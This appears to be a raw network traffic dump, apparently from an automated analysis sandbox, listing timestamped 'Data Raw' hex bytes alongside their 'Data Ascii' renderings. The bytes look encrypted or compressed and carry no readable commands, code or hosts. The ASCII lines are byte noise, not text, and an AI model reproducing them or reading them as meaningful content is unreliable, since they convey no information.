                                                                                                                                                                                                2023-11-17 18:25:36 UTC25INData Raw: b7 4f b8 c2 85 5c dc 8c de 0c f3 1d 60 01 d2 d5 9f 57 9f 41 0b 30 62 1b 84 ed 30 b2 6d 58 af f4 70 39 28 2b 0f c1 33 8f 86 ca 3f 5e 1e 16 b6 35 ab a9 dd 20 44 64 2e 71 0e 19 e9 45 de 12 05 8f d0 91 ad ab b8 51 25 e4 8e 43 33 b2 93 99 6e 75 fb 26 4b be 1f fa 13 bc cd c6 ef ba 2f a3 f7 90 75 a3 3d bd 3c 35 65 df 0c de 0e 10 68 14 f9 e4 16 41 6b 40 89 0b f0 e1 46 b8 05 a8 34 a6 7f 36 48 02 f1 da b2 1c 67 4c 57 b8 82 e7 fb 1f 15 1b 45 34 43 52 56 bb 36 4f 86 a5 d8 16 9b 70 b3 42 e7 89 18 fc c6 d5 d3 52 ce b6 0a 8b 61 33 e0 db 09 88 6c 91 e6 b7 e2 8f c8 f7 1d fc e4 cf d0 47 61 b1 b6 29 1d 39 d1 91 4b aa 4b e5 c6 39 68 a9 c7 df d0 7d 21 46 40 93 4b a9 96 f5 a4 8e ea ee 36 d2 37 25 94 bc 70 2b 3d 44 16 76 3d df cd c9 c0 5f e8 20 e9 51 32 b2 22 43 fb 62 4a 4c 7e
                                                                                                                                                                                                Data Ascii: O\`WA0b0mXp9(+3?^5 Dd.qEQ%C3nu&K/u=<5ehAk@F46HgLWE4CRV6OpBRa3lGa)9KK9h}!F@K67%p+=Dv=_ Q2"CbJL~
                                                                                                                                                                                                2023-11-17 18:25:36 UTC26INData Raw: 7d 06 af 63 73 42 4e 8d 27 1b 40 64 f6 cd 60 90 96 4c 65 06 e8 19 e5 5b 23 26 b7 20 15 b4 d6 21 b2 5b 06 bc d5 ca 6f 90 02 d0 01 8e 29 6a 68 90 cf b1 0e 4a 67 00 24 7c 33 ab dc ac 84 3a 25 a2 36 0a bf 76 b9 b3 46 b4 af ee 72 23 73 83 11 ba 7c 3f ee 20 d0 71 82 06 0a e5 db b5 b1 23 92 2d c3 7d c7 39 c2 ae 22 a7 84 f5 d5 65 20 4a ce b3 5a 6f 5a e6 83 bc 3f 5e 82 d7 36 ab e7 84 dd 0e 23 b7 36 08 42 86 6b cc c0 c5 ad d5 54 6a da 50 05 d1 94 5b 69 f0 1b cc 87 5f d3 0d 3c 0d aa 3a 33 8c e1 d1 26 24 1b 6a 6c 35 43 d2 e7 6b 5e 25 71 b8 b8 f5 03 01 ba 17 40 5c f1 18 10 67 44 5b 80 10 9f f0 c8 d9 01 93 d8 71 6c 6d 86 85 fe c1 8d 7f 8a 14 e5 20 64 41 8e 5a e0 7c 44 76 c4 d1 df b6 4a 4c 33 24 84 44 cd 0b 53 12 42 c9 91 69 8b 0f 4e 33 69 bc 46 ab 77 83 5a 0a 3b 3a fe
                                                                                                                                                                                                Data Ascii: }csBN'@d`Le[#& ![o)jhJg$|3:%6vFr#s|? q#-}9"e JZoZ?^6#6BkTjP[i_<:3&$jl5Ck^%q@\gD[qlm dAZ|DvJL3$DSBiN3iFwZ;:
                                                                                                                                                                                                2023-11-17 18:25:36 UTC27INData Raw: a3 5a 14 85 2a 60 93 a4 76 72 36 2a 68 c3 a0 c6 1d e8 5d 9f 5b 82 e4 cb 97 ad 35 09 48 20 76 85 11 df 73 c3 9d e0 1d e9 b3 d4 32 4f 20 c5 f4 33 07 ab d8 b0 fa 91 7d 6b 16 a6 09 0a da 86 d5 44 49 f9 d2 ce 4d c9 da f0 b0 d7 dd 38 ee a4 4a 5d a1 ab c4 a8 84 9e 5b d9 fa 9a 20 2c bc c1 8d 58 73 e0 69 65 97 c0 0a ff 3c 71 de cb 80 32 0c f5 be d1 9c b8 16 5e 4f 53 e4 31 af b1 c5 e6 7f 18 a9 6c 04 d5 d8 f6 6a 20 cd 70 6d f5 29 e3 84 26 4c 44 35 f6 fe 75 49 76 88 98 9d c1 74 33 13 2d dd d3 ab 58 b0 3b a4 d9 32 df ec 5d 59 27 c6 95 da 98 b8 7e a3 4d 6d 27 6c c0 dc 67 89 38 48 d4 08 ed 32 29 6d 10 ee e0 e9 d1 e0 11 73 25 da 5a 48 a9 4d 0c c8 65 b3 04 1b c3 62 3a 58 03 96 08 6f 49 39 03 94 10 b9 1f 44 a9 30 ec 0b 9d e8 53 fe 80 36 82 be a1 ec aa 34 8a a3 4f bb c8 38
                                                                                                                                                                                                Data Ascii: Z*`vr6*h][5H vs2O 3}kDIM8J][ ,Xsie<q2^OS1lj pm)&LD5uIvt3-X;2]Y'~Mm'lg8H2)ms%ZHMeb:XoI9D0S64O8
                                                                                                                                                                                                2023-11-17 18:25:36 UTC29INData Raw: 4b c1 fd 44 b6 ac f0 b0 58 6e 99 0a 44 db 35 10 02 93 d8 c4 46 8c 7d 37 7d 44 61 4d b1 57 94 5b 6e 39 a9 db 9f 8a 51 25 b1 22 2e 02 3b b8 02 a7 57 ed 44 72 22 b2 1c 9f bc ed 7e 01 84 a3 b9 0e 97 9e b5 af 1f b3 0b 15 ab 4c 02 1e 45 54 22 db 2a 41 62 77 bf a7 9c 73 bf e7 ea 1d cc a1 45 eb f2 ff 80 fc 61 59 f4 d0 d2 0c 54 74 ef f1 c9 b6 b9 89 60 88 1e 4c f9 a8 ea 41 f2 e9 e4 2b 64 6d 93 c9 63 c1 8d 05 92 61 cf 2a 38 a9 df 74 91 54 42 6f 9b 8d 0a a5 2f 73 e4 1a cb a9 f7 25 1e 21 f4 5e a5 8b c4 56 67 87 68 a7 76 a3 79 d9 f2 ff 03 f4 7e bf ba 5f 98 37 4b 7f 09 0d 9f 03 46 9f 8d d1 96 df d3 82 ad dc f2 bb 5e 7d d4 6b 2a a8 2d ea 43 04 7e 2f 01 55 ee 2c 15 89 0b 3e d7 16 31 26 94 3c d2 f6 e8 bd fb 03 06 58 92 be 6f 19 4b 5b 04 76 bc b9 2f aa a4 f2 19 70 bc 41 9a
                                                                                                                                                                                                Data Ascii: KDXnD5F}7}DaMW[n9Q%".;WDr"~LET"*AbwsEaYTt`LA+dmca*8tTBo/s%!^Vghvy~_7KF^}k*-C~/U,>1&<XoK[v/pA
                                                                                                                                                                                                2023-11-17 18:25:36 UTC30INData Raw: d8 2c d1 a1 14 fc 8a 46 06 fe 76 05 54 71 7e 28 f3 90 bb df d6 e3 79 f4 d6 44 15 70 e5 a4 ca 57 71 21 01 4d fc b7 71 ed 33 2b 2d fc c9 c5 42 8c 51 10 3d 3e 10 42 93 2c 94 ea 1d ef 40 11 f6 02 9c 45 0c 14 8d dd c2 64 93 99 9d 6c 3b c5 d9 e9 b0 67 15 44 7d 6b 80 a8 80 3e 4c e2 02 65 30 48 a4 fd 4e 2d a4 f4 2b 98 02 54 0f 91 ba e1 4d 08 2e 90 af 4b b1 cd 73 d4 09 c6 5e 2d 07 cf b3 a1 d1 ce 53 f1 29 86 a7 1f 8b f7 48 7c 39 d0 bc 7d 33 66 9d 91 05 be 78 af 76 11 bd 70 32 54 53 53 ef 58 90 81 69 02 87 53 15 12 a5 7e af db 33 eb 67 c6 b2 7b bc 1b e8 71 51 3a 37 ae 5a 0e fd 7a 06 8e d9 c5 6a 7d d5 96 fb c9 f6 cc 8f 6f d1 96 e2 13 54 2c 69 f4 ef 36 52 e4 23 50 01 65 7a f7 fb c6 31 ea bf 7b 5d 75 68 f1 89 62 55 e8 96 03 56 c2 23 93 fd 9d fe 81 71 6d 2e 16 7e 0c 8a
                                                                                                                                                                                                Data Ascii: ,FvTq~(yDpWq!Mq3+-BQ=>B,@Edl;gD}k>Le0HN-+TM.Ks^-S)H|9}3fxvp2TSSXiS~3g{qQ:7Zzj}oT,i6R#Pez1{]uhbUV#qm.~
                                                                                                                                                                                                2023-11-17 18:25:36 UTC31INData Raw: de 1a ea b5 75 f2 59 e1 40 e3 93 ed 52 08 73 d0 b7 fc 08 54 4a ef af 1a 1c b5 e4 cb 3b 4c cd 04 16 32 c5 a2 bc 1c 31 03 d5 d3 28 7a 96 41 d0 4b 50 41 f9 3f a2 5d a4 06 9b 03 04 fc 76 b1 90 ca d2 ad 0c 5c 8c ef 18 0d e2 d2 a4 2e 82 96 82 45 6e 65 72 b6 f6 12 74 f2 a7 0f 89 9e e6 a9 9a 32 6f 23 af 44 f7 3c 2f 89 1f 8d 98 16 5b ed 1e 46 f2 f9 cc 0b dc d1 32 7c b8 a6 4d 32 db 93 bb 7f e2 eb 48 a9 ee 1b 13 eb 01 ba c7 23 b4 f6 96 5d 7e 26 fb 86 53 8b 4a 75 65 7a b1 b6 d0 c2 e8 1e cb fd 59 6f b9 fb f7 3d 0b f4 c4 3c 4f 0c f7 db 59 38 75 b3 5f 03 e9 24 71 a1 b6 15 5c 19 22 8b ec 51 50 42 d9 60 5b 4b f5 d9 62 f4 84 12 c6 bd b9 9f 16 cd 0b 81 d3 bd 0e 2b 83 a4 83 59 43 72 bf 7a eb e6 ee 04 d6 4a 7e e8 b8 36 17 aa 92 2b 6e c5 6c 81 18 26 f8 ad ff f5 70 30 2c 4c 9e
                                                                                                                                                                                                Data Ascii: uY@RsTJ;L21(zAKPA?]v\.Enert2o#D</[F2|M2H#]~&SJuezYo=<OY8u_$q\"QPB`[Kb+YCrzJ~6+nl&p0,L
                                                                                                                                                                                                2023-11-17 18:25:36 UTC32INData Raw: 45 73 f8 bf f4 93 52 c8 da 96 15 fd 3a de b8 a7 db 11 be 05 da 71 08 6f 1a 8a a8 26 cc de 05 5d 5f e3 ac 7b ae 20 ee 43 67 2b 70 42 be 92 9e 66 c8 53 55 5f 4d 9e e3 15 3f 38 4a 61 41 97 dd 61 1a 29 53 e1 99 e1 50 dd 8f 3e c2 13 7d fa db eb 87 77 1d 3d 37 54 56 0e ef cd 20 74 f7 87 26 43 a8 57 08 ce 7a 10 7d 02 89 93 e7 c6 59 4d c9 5a 10 3b 7b c0 2d 81 53 6c fc b9 5f 55 70 ad 4f 43 02 6d 41 27 5c 7e 12 b9 ea d9 6b a6 1f 02 44 80 48 d5 93 15 2d 98 8c 5e 53 62 4e 65 3b 5b f0 45 ee f1 78 fb 0e 02 5b c2 c2 db 07 f0 be 9e 21 7e b4 dc 3e cf 2b d3 0a 9f cd fa eb b9 71 49 25 bf 61 bf de 01 d0 ea 9f c2 3d b2 45 59 e0 ed 68 67 38 9f f8 a6 5b 24 3f f8 a1 73 63 6f 11 65 66 09 96 88 47 e0 a3 46 02 5c e6 0b 56 a7 83 8f 2e 0a 5b df a9 bd 47 d7 87 50 81 5f b7 66 1c 68 65
                                                                                                                                                                                                Data Ascii: EsR:qo&]_{ Cg+pBfSU_M?8JaAa)SP>}w=7TV t&CWz}YMZ;{-Sl_UpOCmA'\~kDH-^SbNe;[Ex[!~>+qI%a=EYhg8[$?scoefGF\V.[GP_fhe
                                                                                                                                                                                                2023-11-17 18:25:36 UTC33INData Raw: 04 7c d3 57 19 75 7a d9 fe bc ca e6 e2 83 69 9a 5d 75 e8 f6 77 e4 f0 b9 f1 ea 7b 17 e1 89 4d 95 df bc b4 a8 ad 8a b5 a0 f5 fa bc 7b 06 16 99 bc 51 35 39 11 f8 45 5d 50 f8 3e 9a c3 84 e1 42 9b aa a1 0a 87 29 99 75 c3 f1 24 09 f4 ff 5c 50 ab de 18 0c 39 f9 80 af fc 11 b5 cb 9d 5b 97 0c 37 f3 6f b9 30 60 60 71 48 57 a4 b2 d7
                                                                                                                                                                                                Data Ascii: |Wuzi]uw{M{Q59E]P>B)u$\P9[7o0``qHW
                                                                                                                                                                                                2023-11-17 18:25:36 UTC34INData Raw: a9 28 cb 6f a8 5f 0f e6 04 a6 b8 14 5b 08 4f a2 63 87 02 f4 3f a5 34 6b ee 37 0b 4f 5b 89 86 e3 98 a9 50 9b 84 8a 5d c3 c2 32 2b fa 9d bd 14 2f 4d ac a0 f0 b1 5b 6e 20 31 70 7b 9b 7d bb 8d 9e dc df 57 e4 09 8d 6b ce 5d 9f 4d 12 42 65 22 92 00 fd ba d0 56 24 ce c3 3b ba 81 e4 b3 42 0c e9 c1 40 58 48 e2 a8 cb 5f 05 e0 78 36 23 48 06 38 ce 1a 93 2d 9f 4d bc 33 8e 6b 24 d0 30 7e 72 dd 8d a0 00 f9 0d 5c 60 df b5 b8 0f 1a ae ae 64 a7 fd 89 73 da f7 67 32 45 7f b4 3d 5e a2 30 0a 72 e8 0e 06 51 35 ea a4 9d d3 ff cf b8 05 ba 96 4c 03 0c 45 63 1f 36 f5 8c 3e 47 83 10 96 8f f4 ee 2f bd 87 39 3d 10 01 03 f3 f5 35 e6 e9 e5 9d dd 7f b4 da b2 84 55 e4 10 48 a0 9c 8a 2a 04 d8 0e 58 9e f7 55 0a 52 fb a0 b6 a8 01 ee 07 e8 7b 20 b2 3f 10 ad da 5b e7 5e aa ba e0 0c c1 26 df
                                                                                                                                                                                                Data Ascii: (o_[Oc?4k7O[P]2+/M[n 1p{}Wk]MBe"V$;B@XH_x6#H8-M3k$0~r\`dsg2E=^0rQ5LEc6>G/9=5UH*XUR{ ?[^&
                                                                                                                                                                                                2023-11-17 18:25:36 UTC35INData Raw: f2 86 fb 2a 45 60 d1 5f 35 5f a2 ff 96 db 19 cc 3d fe da dd d0 f9 f5 30 35 ce 57 0d 98 8b 3e 6a e8 be 82 d4 c4 d2 2c e9 38 60 d5 c2 e9 ba 82 f0 c6 8c 7f 94 23 78 13 16 09 2b 29 57 76 74 61 61 f4 07 5f 37 54 04 da 7e 0f 22 0c 89 d0 4e 4b 5d 38 5a b1 91 6e 86 70 57 75 cc 33 00 19 cf 3a 47 44 29 66 69 e6 93 8c 33 01 3f dd 42 bd 0b 84 36 1f 12 12 b9 c9 3e 35 8c f2 51 08 fd 36 f4 29 e5 21 eb 14 f5 24 99 9e fd e9 ec a7 7f 6b fe 54 3d 69 4a 32 fe d6 9e fb 1e 50 c0 74 db e4 22 25 b5 2e 72 49 87 db 65 c0 f6 a4 e0 8b ed b5 90 02 dd d7 8d 51 14 55 4d fa 90 3f 98 21 f5 34 e5 28 64 f3 72 4c cb c5 f7 8b 38 ad ad 69 e8 e1 a8 aa 5e 96 0e fa 48 19 75 a6 9a f8 c9 54 43 7c 28 57 6f c2 7d ef 2a 05 5c c4 f6 60 9a 05 ac f8 7e d6 97 cc 03 c5 c8 69 d9 60 b6 1c fb a2 ee 3d a7 56
                                                                                                                                                                                                Data Ascii: *E`_5_=05W>j,8`#x+)Wvtaa_7T~"NK]8ZnpWu3:GD)fi3?B6>5Q6)!$kT=iJ2Pt"%.rIeQUM?!4(drL8i^HuTC|(Wo}*\`~i`=V
                                                                                                                                                                                                2023-11-17 18:25:36 UTC36INData Raw: e9 56 89 a0 68 50 7f b8 a5 29 b6 42 3a 14 7e 55 f2 49 69 c0 51 90 6a 27 86 23 c0 9b 1b 31 2d 84 49 92 2f e7 e3 78 96 e8 74 b7 54 da 56 b4 ae 37 67 bd c6 56 44 17 b0 c7 26 81 39 d7 c4 3a 87 65 bb 3b a9 5d db 43 93 3b 61 10 2a fd 38 ad f7 6f 7e ab e5 2c 1d 4d de c6 20 15 55 a6 f6 6e df 1b 9d 86 43 dc c8 ba 9b 7e c3 15 b8 d0 b2 4e 23 cc 83 0f 5d ce f9 43 ed 6a 24 08 f5 b5 26 ba 70 6c 6b 65 fc 41 81 d9 4c 04 58 4f d6 44 33 a7 46 70 3d e5 d7 1d 36 ce a9 a2 0b e5 dc fc 34 e9 4d 7c 98 af e9 7e 37 a8 03 12 68 c0 0e 06 c8 7a 66 3d 93 8e 25 b7 f1 5a cd 18 53 45 2d 55 70 4f 69 38 26 6a de d3 2b 96 57 71 fb c2 4a 3b bb a7 78 da b8 5b 4d 5d d6 a4 45 25 99 6a a0 b1 fe f2 43 ab ff cf e0 66 eb f5 87 6a 83 6a a8 d1 83 c9 24 a0 93 c1 21 ca 77 13 f8 c9 dd 12 12 f4 31 15 b6
                                                                                                                                                                                                Data Ascii: VhP)B:~UIiQj'#1-I/xtTV7gVD&9:e;]C;a*8o~,M UnC~N#]Cj$&plkeALXOD3Fp=64M|~7hzf=%ZSE-UpOi8&j+WqJ;x[M]E%jCfjj$!w1
                                                                                                                                                                                                2023-11-17 18:25:36 UTC37INData Raw: ee b2 c1 93 52 5a 38 13 9f 71 94 c3 fc 7f 4b ff 72 b6 0e 23 56 7a 06 bf d8 7d 26 43 5e b1 9f 27 36 38 c4 8d 77 92 14 2a 78 1a 62 c7 43 ba 31 6e 67 2e 69 76 51 bd 79 3e 4b e0 d1 a8 a2 bf fc 8b 8d 17 be e1 d2 33 ec 3f 9c dc c4 98 d2 15 dc 2c 95 74 06 bd aa af 92 ae 4a 26 29 3c 96 c1 3e 67 85 2b ac f2 c5 cd 04 e6 bd e7 5a c9 c7 1c 9c 1c f1 1b f0 b1 7f c5 a6 5a 71 a1 9c 62 b0 a1 98 4f a7 05 e9 a4 23 65 66 2d 38 db 58 36 7c 85 b7 6b 40 f2 4d eb 44 88 bd b4 aa 3f 42 30 a5 53 63 bd a4 60 13 e1 5d c8 04 a7 4d 8d 76 12 4d 43 5a a3 bb 9d ca f4 19 b6 25 57 5b 5b 0b 7e 76 bc 36 94 dc 20 f2 90 1e 4a fa 9c 2d 3b 2f 5c ec 3b 7d db 0b 9b f5 17 89 a6 00 59 bc 59 40 0e 05 dc 9e 97 3a 79 e3 5f 21 ff 21 1f 70 68 5e cc 27 90 a8 c6 cf a3 25 ad e0 13 1d 80 1f 49 c5 b5 78 1b 02
                                                                                                                                                                                                Data Ascii: RZ8qKr#Vz}&C^'68w*xbC1ng.ivQy>K3?,tJ&)<>g+ZZqbO#ef-8X6|k@MD?B0Sc`]MvMCZ%W[[~v6 J-;/\;}YY@:y_!!ph^'%Ix
                                                                                                                                                                                                2023-11-17 18:25:36 UTC38INData Raw: 8a b9 95 40 e5 9d 9e 3f 06 b8 6c 7b ee 82 fe 54 2a a9 d8 5a 23 f1 b2 9c 17 de da 24 87 3c 84 d2 41 cb af 90 6a 84 f3 8d 0b b8 3c f4 65 fd 20 ce 4a 0f 50 f4 12 c0 ed 5e 14 f5 12 36 6d c8 45 60 fb cd 19 4c 79 dc 66 9c a0 fe b0 5f 64 1b c9 d7 11 70 7f 56 64 6a a9 5a cb 3e b6 e8 80 8b ee 16 68 98 9b 58 ab cb e1 68 8a ec c7 86 e2 b1 56 82 e0 2b f2 26 68 74 39 da 1e 6b e1 48 f7 fc 18 7a f5 40 86 ba 99 58 c6 70 e2 4a 6d 04 c5 09 7a ca 53 d5 e9 3c ea 26 c8 c1 00 f5 33 b6 3a a9 1d d6 5f 13 80 22 fc a3 eb 2f a8 78 d7 9a 19 0c 00 a1 e8 87 7e cf 20 83 12 17 34 bd d0 68 53 d7 51 4e 79 64 f6 31 ed 0a e7 e2 bb 64 f4 01 62 22 cf 08 58 64 4f 8a 9a 6c 92 ed 36 da ea 5c ed 85 45 ef 12 fe 3f 4e 91 df 07 fe 22 1e 35 37 07 ca 65 cd a8 19 3e 09 c8 46 94 7e 3b 0c a8 d9 ae a0 d3
                                                                                                                                                                                                Data Ascii: @?l{T*Z#$<Aj<e JP^6mE`Lyf_dpVdjZ>hXhV+&ht9kHz@XpJmzS<&3:_"/x~ 4hSQNyd1db"XdOl6\E?N"57e>F~;
                                                                                                                                                                                                2023-11-17 18:25:36 UTC40INData Raw: e3 e1 b0 ef f3 b3 6d 9d f5 aa fb 97 d9 6b 07 9a b5 e1 69 11 04 26 1f a6 12 86 0a c1 af 41 16 65 82 e7 dc 06 50 24 54 10 6d 7f 53 d8 91 7f 55 4d 59 01 22 3f d5 ac b7 75 5d fa 16 39 cd b4 96 ee 5e ed 00 ce 5d 99 ae 1b f8 31 98 ed cc e6 b7 70 7b e6 26 ee 49 66 46 7b 67 f8 b4 84 09 c0 62 fa b8 90 2f d6 32 06 98 c9 bb 37 1c 84 25 ad ab bd ce 2a 60 94 5e aa 15 3e 7d e1 bd 2c 5d 1f 61 d4 38 12 b9 d1 8c df de 45 17 81 79 dc a6 b0 74 12 cb 5c 43 6f 44 c2 de ff 5e 7f c9 87 17 77 1d 03 2a 97 0a be 94 a2 0b 3e 85 61 f6 f1 1e 99 0c f3 07 43 f2 51 fc d8 c6 0b 64 af 83 25 20 73 29 55 87 34 3b 7e e5 23 c2 c0 9c 4f 00 e6 ab 59 57 47 01 59 8d 71 f3 c1 fe 38 90 ef 5b b3 74 61 56 1b 9b ab 62 50 0b 24 40 cb 31 eb 58 71 e5 a6 0a 51 a2 9c 44 15 22 f6 09 05 33 eb 28 30 06 8d ea
                                                                                                                                                                                                Data Ascii: mki&AeP$TmSUMY"?u]9^]1p{&IfF{gb/27%*`^>},]a8Eyt\CoD^w*>aCQd% s)U4;~#OYWGYq8[taVbP$@1XqQD"3(0
                                                                                                                                                                                                2023-11-17 18:25:36 UTC41INData Raw: 35 a2 02 af cb b8 7e 73 cd d0 48 1b f3 f8 f0 c3 7d 94 40 0e a1 c0 82 e2 50 6f 98 47 af 0a 18 cf 0e bf 3b f3 63 a3 0b 46 75 46 41 c6 31 68 98 00 1e a5 72 5a 6e 21 17 9b 38 d8 2c 58 a3 44 08 c8 d8 da 1d 85 84 7b 09 a0 bc 47 3e 4a 49 79 e5 0d 82 98 aa a1 94 fc 3a d7 a2 38 5f a6 d0 38 01 04 b8 8e 16 04 39 94 b8 f8 34 b8 72 b3 df fe cb 73 42 4a 27 25 65 dc af 07 30 1b 10 72 7a d4 84 79 02 19 e2 92 ca 33 8d cd 55 46 c1 c8 a0 09 75 af 56 47 1c 93 47 f3 47 e5 13 9f a5 ad 73 4d 11 07 2d 66 d8 52 dd ee 5c 5f 7d 7f 3f 64 9b ce f0 41 c5 18 49 2a 9a 58 10 08 f4 63 56 fc 8c 84 a1 7f 64 c7 69 f9 6c 96 46 46 0f b4 67 4c 3a a1 fd ea 5b 96 af 30 4d 08 eb 71 79 e5 b1 72 eb 98 ba c0 66 a1 f2 72 e3 36 8d 82 a5 99 3d 02 4a af 68 8d 8b 1b 9e de 81 df a8 21 57 c5 c6 8b 10 8e 89
                                                                                                                                                                                                Data Ascii: 5~sH}@PoG;cFuFA1hrZn!8,XD{G>JIy:8_894rsBJ'%e0rzy3UFuVGGGsM-fR\_}?dAI*XcVdilFFgL:[0Mqyrfr6=Jh!W
                                                                                                                                                                                                2023-11-17 18:25:36 UTC42INData Raw: 3c 63 a5 8f be 12 ab 5b 88 1a 50 7d ac 35 52 ba 9e 78 8e b1 74 a3 2d 81 3b 8e 7b 57 02 f0 c4 4e c7 ce a6 14 3b cf db e2 7d 01 49 17 b8 43 69 1f 4f 6b e3 68 2d 13 91 78 fd 1d 72 df 17 a4 9b 32 2a c8 ff 73 4b d3 60 f2 a8 42 39 67 38 cc 92 23 74 eb 0b 95 54 05 d1 8c cf e2 e0 ac f6 be c6 94 2e 04 82 f5 43 6b 78 7b cd 1e e6 93 c5 41 de 53 8f 79 bc 03 51 35 88 55 eb e3 14 85 26 8d c3 c2 e6 b4 17 31 62 e2 aa 32 75 ff 40 36 e3 8e cd 9a 4e 41 f3 3d b8 40 fc 9f 14 63 10 ee 78 1c f9 df 54 98 42 49 9a 41 3b ba 21 22 c4 e8 cb ac c0 2a 1a 0e 61 a7 68 99 f9 d6 e8 1e 6c 98 10 6f be 12 0e 1e 91 64 bd c7 c2 63 1b c7 19 8c 03 fc 22 41 9c b1 bb 36 9d 99 91 f0 45 68 95 92 2a 1a 18 34 21 99 a0 b6 28 12 3d ff 20 37 f2 7a 2f 27 1b b1 56 8c fb f8 07 c8 5f 37 b5 c3 ad bd a5 1e 13
                                                                                                                                                                                                Data Ascii: <c[P}5Rxt-;{WN;}ICiOkh-xr2*sK`B9g8#tT.Ckx{ASyQ5U&1b2u@6NA=@cxTBIA;!"*ahlodc"A6Eh*4!(= 7z/'V_7
                                                                                                                                                                                                2023-11-17 18:25:36 UTC43INData Raw: 8e e1 7b c4 f0 33 a4 ea 85 1f d1 f5 4e 4b 2a aa dc 6f f0 0b 9f 42 bd f0 98 c0 94 f0 7c fb 2b be 45 e0 4b fe c9 4d 77 82 ed 77 c1 62 fd 31 b6 a1 9c 9b 7f 27 e4 25 fa 25 e4 56 72 62 dc 1d 41 89 d2 e0 3f e5 74 59 11 c9 b7 0c 83 7b 88 b5 06 1e 0c 59 73 92 8b 72 1c df 72 cd 53 32 f4 38 9d 8c 68 b1 9b ca 14 1d 71 6f 82 bc d3 38 a3 39 79 12 e4 83 64 8a de 00 c2 02 c6 a9 e9 51 ca 83 4f 0e d0 c0 bb a2 b8 73 5c 97 51 89 85 dc e0 75 73 26 fd 6a bb c6 31 84 87 75 39 8b e0 7d 70 48 62 a7 5e 3e c6 c6 60 fb 35 43 dd c2 b8 fb 03 15 e7 ce 30 da a7 dc 34 8c 53 d2 9f 32 8b 8c a8 d0 61 a2 b0 f3 9d 10 5e 16 3a 17 4f c1 99 57 05 39 0e ec 18 ea 31 cf ca 93 7b 9b b2 b4 73 4a 73 73 8c 2c e9 f8 d2 36 c9 a0 51 5d e7 e1 25 3f b7 2f 11 7b b3 32 03 c0 eb 15 22 bd ef f6 36 84 d2 81 95
                                                                                                                                                                                                Data Ascii: {3NK*oB|+EKMwwb1'%%VrbA?tY{YsrrS28hqo89ydQOs\Qus&j1u9}pHb^>`5C04S2a^:OW91{sJss,6Q]%?/{2"6
                                                                                                                                                                                                2023-11-17 18:25:36 UTC45INData Raw: cd d5 19 09 fa ff 39 01 fd d7 ae e7 1e d4 4b ba f8 1e b6 95 4d f5 f7 d9 62 58 c7 16 39 de 71 e7 bb 62 8b 74 18 7d ab 5b 78 95 7c b4 d8 e5 ed 97 31 51 4b 07 21 db 7d f6 67 14 0e c8 f9 67 a4 ff 46 f4 78 75 6d 30 e8 5b 5e f0 76 0a ab 01 e4 7e f9 4c 0c 5b e7 1a 99 ec 67 2c 17 1c 39 d8 fa 52 27 48 f7 18 5f 40 1a 92 96 74 ef 24 a4 d6 08 53 d3 65 17 c5 7e 07 77 9f c8 bc 79 f8 c0 33 b5 97 04 d1 b0 0e 10 69 c3 8f e4 42 b7 df ad 88 b4 cc fa ad c2 a3 b4 ba d3 89 be 8a de 81 f5 98 ca 81 8b 40 5d b6 a8 20 b5 21 2b fc 60 54 e5 42 53 37 4f 9d d2 d7 1b f5 28 38 0d 11 8d 3d e4 b8 81 e2 6d 8a da c8 27 eb 95 cb ab df 87 f8 77 ab 98 f2 09 c7 2f 7a 2d cc 36 ac aa 3f b8 1e 01 d6 f5 71 91 1b cf f8 8a ac 92 c4 35 a1 b0 ba 7b df 1c 7b e7 b6 82 24 b0 d2 dd 46 1d a1 51 a8 80 fb 98
                                                                                                                                                                                                Data Ascii: 9KMbX9qbt}[x|1QK!}ggFxum0[^v~L[g,9R'H_@t$Se~wy3iB@] !+`TBS7O(8=m'w/z-6?q5{{$FQ
                                                                                                                                                                                                2023-11-17 18:25:36 UTC46INData Raw: 8f 7d 9e c9 a4 91 46 b9 b9 ba 95 37 7d b5 fe a8 59 1f 0c b1 29 75 3f b5 92 b6 ad d6 2b 25 7e 1d 55 8b 9b 11 8a 7f 3b 02 45 f2 e0 67 44 b2 d2 1b ca 32 41 1b 1f 69 7d bf 41 db df ea bb 07 1c dc f7 e0 f8 4a 8e c8 41 bd 28 ad 84 a0 dc 59 25 58 b8 7d f8 4d 9c 97 9d 74 25 79 b6 93 7e b5 f0 fb 96 ec 5f 7d c7 51 d6 f1 da e5 45 dd 7f bf f6 95 56 3a 7a f5 a6 18 f5 79 25 35 de 45 3a 48 86 6c 58 e9 20 19 e4 2c 73 66 99 25 34 c8 1f e4 78 23 e7 19 fa 66 12 28 bf ca 35 7a cf 06 ab 2c 2d a4 b8 5a 94 b8 45 f9 df 7a d0 38 f5 69 a9 1d 3a 7e ec d3 ad 24 fc 35 e2 61 b5 f2 66 d4 bb 77 8a 0e 04 3d 31 5a 47 d3 c3 b6 6e 9a d0 a4 51 43 6f 6e 47 43 87 67 5b 7d 3f 97 62 ed a4 0e 41 b5 12 55 9d 7d 1e 20 e0 b5 70 2b 26 ab 89 68 86 29 ff 39 53 c3 6c 0e 98 40 e0 54 a6 5f c0 a9 50 0a 33
                                                                                                                                                                                                Data Ascii: }F7}Y)u?+%~U;EgD2Ai}AJA(Y%X}Mt%y~_}QEV:zy%5E:HlX ,sf%4x#f(5z,-ZEz8i:~$5afw=1ZGnQConGCg[}?bAU} p+&h)9Sl@T_P3
                                                                                                                                                                                                2023-11-17 18:25:36 UTC47INData Raw: 5c da e6 63 17 cd 50 16 14 2c 25 c2 5c bc 96 b1 cb 18 ea f4 1f 75 05 9b c0 22 9b f7 cc 3a 35 ee 43 fc 3c 53 67 89 9a 3c e3 65 95 fc 2b af 3b 04 ae 3c f1 fa 01 7e 7c 2c e6 83 5d 12 c9 44 45 5d 89 78 16 d6 f5 08 24 10 b1 7c d7 ab 2d 6e 89 9c bd 45 5b 10 7d 7b 86 4c 8d 5f 90 36 64 a0 4d 7c 00 cf e2 5c 09 af b3 b9 2a 92 6a 50 8c 12 de 6d 6a b2 ec 4b a4 dc bc b6 21 f7 c3 12 ee 9e 12 97 82 49 88 7a e7 76 16 d3 2b 46 4e 14 bf 93 fd 52 a2 88 43 15 32 61 ab 0e d8 d3 10 87 c3 86 0d b6 4f 26 eb 5f 89 cf 5b 47 fc 78 e6 a4 96 60 8e b6 a4 b3 a9 dc b6 11 94 3a 37 18 f6 b4 97 d1 7c 3b f7 35 4d c8 bc 03 5f 50 0e b5 0c d0 5a b8 59 9d 69 85 9c e4 b4 c2 69 75 7c 06 c1 00 c6 76 82 b8 c1 96 88 43 fa 43 78 0b 9b c1 9e 58 c8 d4 ab 02 2c 02 bf 12 30 5c 4f 48 e8 95 58 5b e5 ba c0
